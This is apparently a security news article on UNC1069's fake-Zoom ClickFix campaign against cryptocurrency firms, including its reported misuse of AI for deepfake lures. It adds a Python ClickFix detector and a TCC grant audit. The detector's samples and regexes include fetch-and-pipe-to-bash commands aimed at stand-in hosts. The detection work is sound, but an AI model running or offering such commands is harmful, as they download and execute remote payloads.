The North Korea-linked threat group UNC1069 has intensified its operations against the cryptocurrency sector, combining targeted social engineering with AI-generated content to compromise Windows and macOS systems. The campaign is built to harvest credentials and browser session data and to enable large-scale theft of cryptocurrency.
According to Google Mandiant researchers Ross Inman and Adrian Hernandez, the operation chained together a compromised Telegram account, a fraudulent Zoom meeting, a ClickFix-style infection technique, and AI-generated video to deceive victims.
A Long-Running Financially Motivated Campaign
Active since at least April 2018, UNC1069 has built a reputation for conducting financially motivated cyberattacks through carefully crafted social engineering campaigns. The group frequently impersonates venture capital investors and representatives of well-known firms on Telegram. Within the cybersecurity community, it is also identified as CryptoCore and MASAN.
In a previous report published in November, the Google Threat Intelligence Group (GTIG) revealed that the group had used generative AI tools such as Gemini to produce persuasive cryptocurrency-themed lure material, and had also attempted to misuse Gemini to develop code for cryptocurrency theft. That campaign used deepfake images and videos imitating legitimate industry professionals to distribute a backdoor named BIGMACHO, disguised as a Zoom software development kit.
Since 2023, the group has shifted focus from traditional financial institutions to the Web3 ecosystem, targeting centralized exchanges, financial software developers, technology firms, and venture capital organizations.
Social Engineering Through Fake Zoom Meetings
The attack begins when victims are approached on Telegram by individuals posing as venture capitalists. In some cases, attackers exploit compromised Telegram accounts belonging to legitimate entrepreneurs or startup founders to enhance credibility.
After initial contact, a 30-minute meeting is scheduled through Calendly. The meeting link redirects victims to a fraudulent Zoom-themed website such as "zoom.uswe05[.]us". In some cases the phishing URL is hidden behind Telegram's hyperlink feature, so the displayed text does not match the actual destination.
Once the link is clicked, victims are shown a counterfeit Zoom interface prompting them to activate their camera and enter their name. Upon joining, the interface mimics a live Zoom meeting. Investigators suspect that the video content displayed may either be deepfake material or previously recorded webcam footage of earlier victims.
Kaspersky has tracked this activity under the name GhostCall, documenting how attackers secretly recorded webcam sessions and reused them to create the illusion of legitimate live calls. When the pre-recorded footage ends, the interface transitions smoothly to a static profile image, maintaining the deception.
ClickFix Infection Chain and Malware Deployment
Following the staged meeting, victims are shown a fabricated audio error and told to resolve it by pasting and running a "troubleshooting" command in their terminal, the ClickFix technique.
On macOS systems, these commands trigger an AppleScript that installs a malicious Mach-O binary known as WAVESHAPER. This C++ executable gathers system intelligence and deploys a Go-based downloader called HYPERCALL, which retrieves additional malicious payloads.
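The defensive counterpart to the step above is to catch the pasted command itself, before WAVESHAPER lands. The following is an added detection example written for this article, not code from Mandiant or from the malware; it scores command lines for the ClickFix building blocks (an osascript or shell invocation combined with a download, decode or pipe-to-interpreter stage) and flags those typed into an interactive terminal. The record shape, the terminal-app allowlist, the regexes and the sample command lines are all constructed for the example; hostnames use the reserved `.invalid` TLD and are not indicators from the campaign.

```python
import re

# Regexes for the building blocks of a macOS ClickFix command (constructed for this
# example; tune them against your own telemetry before deploying).
INDICATORS = {
    "osascript": re.compile(r"\bosascript\b"),
    "inline_applescript": re.compile(r"\bosascript\b[^|;&]*\s-e\s"),
    "do_shell_script": re.compile(r"do shell script", re.IGNORECASE),
    "remote_fetch": re.compile(r"\b(?:curl|wget)\b"),
    "pipe_to_interpreter": re.compile(r"\|\s*(?:sudo\s+)?(?:sh|bash|zsh|osascript|python3?)\b"),
    "base64_decode": re.compile(r"\bbase64\s+(?:-d|-D|--decode)\b"),
    "quarantine_bypass": re.compile(r"\bxattr\s+-[A-Za-z]*[dc]\b"),
}

# Indicators that mean "fetch, unpack or execute a second stage".
STAGE2 = {"remote_fetch", "pipe_to_interpreter", "base64_decode", "quarantine_bypass"}

# Terminal apps a victim would paste into (constructed allowlist; extend as needed).
INTERACTIVE_PARENTS = {"Terminal", "iTerm2", "Warp"}


def indicators_for(cmdline: str) -> set[str]:
    """Return the names of all indicator patterns present in a command line."""
    return {name for name, rx in INDICATORS.items() if rx.search(cmdline)}


def is_clickfix_like(cmdline: str) -> bool:
    """True when the command runs AppleScript/shell AND pulls in or unpacks a payload.

    A lone osascript call (notifications, desktop automation) is not enough: the
    ClickFix lure needs the download/decode/execute part to deliver a binary.
    """
    hits = indicators_for(cmdline)
    if "osascript" in hits and hits & STAGE2:
        return True
    if {"remote_fetch", "pipe_to_interpreter"} <= hits:
        return True
    if {"base64_decode", "pipe_to_interpreter"} <= hits:
        return True
    return False


def scan(records: list[dict]) -> list[tuple[int, list[str]]]:
    """Flag process-exec records launched from an interactive terminal that look like ClickFix."""
    findings = []
    for rec in records:
        if rec["parent_app"] in INTERACTIVE_PARENTS and is_clickfix_like(rec["cmdline"]):
            findings.append((rec["pid"], sorted(indicators_for(rec["cmdline"]))))
    return findings


# Constructed process-execution records. The shape is hypothetical: an EDR or a
# `log show` export would be normalised into it. Hostnames use .invalid on purpose.
SAMPLE_RECORDS = [
    {"pid": 1001, "parent_app": "Terminal",
     "cmdline": "osascript -e 'display notification \"Build finished\"'"},
    {"pid": 1002, "parent_app": "Terminal",
     "cmdline": "curl -fsSL https://zoom-audio-fix.example.invalid/fix.sh | bash"},
    {"pid": 1003, "parent_app": "Terminal",
     "cmdline": "osascript -e 'do shell script \"curl -s https://cdn.example.invalid/u.scpt "
                "-o /tmp/u.scpt; osascript /tmp/u.scpt\"'"},
    {"pid": 1004, "parent_app": "Terminal",
     "cmdline": "echo aGVsbG8= | base64 -D | bash"},
    {"pid": 1005, "parent_app": "Xcode",
     "cmdline": "osascript -e 'do shell script \"xcodebuild -list\"'"},
    {"pid": 1006, "parent_app": "Terminal",
     "cmdline": "curl -O https://example.invalid/README.md"},
]

if __name__ == "__main__":
    for pid, hits in scan(SAMPLE_RECORDS):
        print(f"pid {pid}: ClickFix-like command, indicators {hits}")
```

The rule deliberately requires two stages: a benign developer running osascript for a notification (pid 1001) or curl to fetch a README (pid 1006) is not flagged, while the three ClickFix shapes (fetch piped to bash, AppleScript wrapping a curl-and-run, base64 decode piped to bash) are. The parent-app check matters because the defining feature of ClickFix is that the victim, not the malware, runs the first command.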
The attack chain includes multiple malware families:
- HIDDENCALL, a Golang backdoor that provides remote keyboard access and deploys a Swift-based data miner named DEEPBREATH.
- SUGARLOADER, a secondary C++ downloader responsible for deploying CHROMEPUSH.
- SILENCELIFT, a lightweight C or C++ backdoor that transmits system data to a command-and-control server.
- DEEPBREATH, designed to manipulate macOS Transparency, Consent, and Control settings, enabling unauthorized access to files and credential stores.
- CHROMEPUSH, a C++ browser extension disguised as an offline Google Docs editor, capable of stealing browser cookies, logging keystrokes, and extracting login credentials.

DEEPBREATH specifically targets iCloud Keychain credentials, browser data from Google Chrome, Brave, and Microsoft Edge, as well as Telegram and Apple Notes data.
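Because DEEPBREATH's route to files and credential stores runs through TCC, the grant table itself is worth auditing on a suspect Mac. Below is an added example written for this article (not Mandiant's tooling and not a description of how DEEPBREATH modifies TCC, which the report above does not detail): it reads the `access` table of TCC.db and reports allowed grants on sensitive services whose client is not on an expected list, is a bare filesystem path rather than a bundle identifier, or was granted very recently. The service and column names are the real ones used by macOS; the allowlist, the in-memory sample database, its rows and the `ZoomFix` path are constructed for the example.

```python
import sqlite3
import time

# System-wide TCC database. Reading it requires Full Disk Access, so run this from an
# FDA-granted terminal or against a forensic copy of the file.
SYSTEM_TCC_DB = "/Library/Application Support/com.apple.TCC/TCC.db"

# TCC services whose grant yields file or credential access worth auditing.
SENSITIVE_SERVICES = {
    "kTCCServiceSystemPolicyAllFiles",        # Full Disk Access
    "kTCCServiceSystemPolicyDesktopFolder",
    "kTCCServiceSystemPolicyDocumentsFolder",
    "kTCCServiceAccessibility",
    "kTCCServiceScreenCapture",
    "kTCCServiceAppleEvents",                 # Automation: script other apps
}

AUTH_ALLOWED = 2        # auth_value meaning "allowed"
CLIENT_TYPE_PATH = 1    # client_type: 0 = bundle identifier, 1 = absolute path

# Constructed allowlist of clients expected to hold sensitive grants in this environment.
ALLOWED_CLIENTS = {"com.apple.Terminal", "com.example.corp-edr"}


def open_tcc_db(path: str = SYSTEM_TCC_DB) -> sqlite3.Connection:
    """Open TCC.db read-only so the audit itself can never alter a grant."""
    return sqlite3.connect(f"file:{path}?mode=ro", uri=True)


def audit_grants(conn, now, allowed_clients=ALLOWED_CLIENTS, recent_window=3600):
    """Return allowed grants on sensitive services that are unexpected or freshly created."""
    placeholders = ",".join("?" * len(SENSITIVE_SERVICES))
    rows = conn.execute(
        "SELECT service, client, client_type, auth_value, auth_reason, last_modified "
        f"FROM access WHERE auth_value = ? AND service IN ({placeholders}) "
        "ORDER BY last_modified DESC",
        (AUTH_ALLOWED, *sorted(SENSITIVE_SERVICES)),
    )
    findings = []
    for service, client, client_type, _auth_value, auth_reason, last_modified in rows:
        reasons = []
        if client not in allowed_clients:
            reasons.append("client not in allowlist")
        if client_type == CLIENT_TYPE_PATH:
            reasons.append("client is a filesystem path rather than a bundle id")
        if now - last_modified <= recent_window:
            reasons.append(f"granted within the last {recent_window}s")
        if reasons:
            findings.append({"service": service, "client": client,
                             "auth_reason": auth_reason, "reasons": reasons})
    return findings


def build_sample_db(now):
    """Constructed stand-in for TCC.db: real column names, a subset of the real columns."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE access (service TEXT, client TEXT, client_type INTEGER, "
        "auth_value INTEGER, auth_reason INTEGER, last_modified INTEGER)"
    )
    day = 86400
    conn.executemany("INSERT INTO access VALUES (?, ?, ?, ?, ?, ?)", [
        ("kTCCServiceSystemPolicyAllFiles", "com.apple.Terminal", 0, 2, 3, now - 40 * day),
        ("kTCCServiceAccessibility", "com.example.corp-edr", 0, 2, 4, now - 90 * day),
        ("kTCCServiceSystemPolicyAllFiles",
         "/Users/victim/Library/Application Support/ZoomFix/helper", 1, 2, 2, now - 300),
        ("kTCCServiceAppleEvents", "com.example.zoomsdk", 0, 2, 2, now - 240),
        ("kTCCServiceCamera", "com.apple.FaceTime", 0, 2, 2, now - 10 * day),   # not audited
        ("kTCCServiceSystemPolicyAllFiles", "com.example.notes", 0, 0, 3, now - 5 * day),  # denied
    ])
    conn.commit()
    return conn


if __name__ == "__main__":
    now = int(time.time())
    # Swap build_sample_db(now) for open_tcc_db() on a real host with Full Disk Access.
    for f in audit_grants(build_sample_db(now), now):
        print(f"{f['service']}: {f['client']} -> {'; '.join(f['reasons'])}")
```

On the constructed data the Terminal and EDR grants are silent, the FaceTime camera grant is outside the audited set and the denied entry is ignored, leaving the two grants an attacker would need: Full Disk Access for a helper living under the victim's Library folder, and Automation for an unknown "Zoom SDK" bundle, both created minutes ago. On a real host, compare each surviving client against the code-signing identity in the `csreq` column as well; a bundle identifier alone is trivial to spoof.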
Expanding Technical Capabilities
Security analysts note that deploying as many as seven distinct malware families on a single compromised host (WAVESHAPER, HYPERCALL, HIDDENCALL, SUGARLOADER, SILENCELIFT, DEEPBREATH and CHROMEPUSH) shows a deliberate effort to harvest credentials, browser session tokens, and financial data through several independent paths. This layered tooling substantially extends UNC1069's operational reach.
While the group historically focused on cryptocurrency startups and venture capital firms, the introduction of new malware variants such as SILENCELIFT and DEEPBREATH indicates a notable evolution in capability and persistence.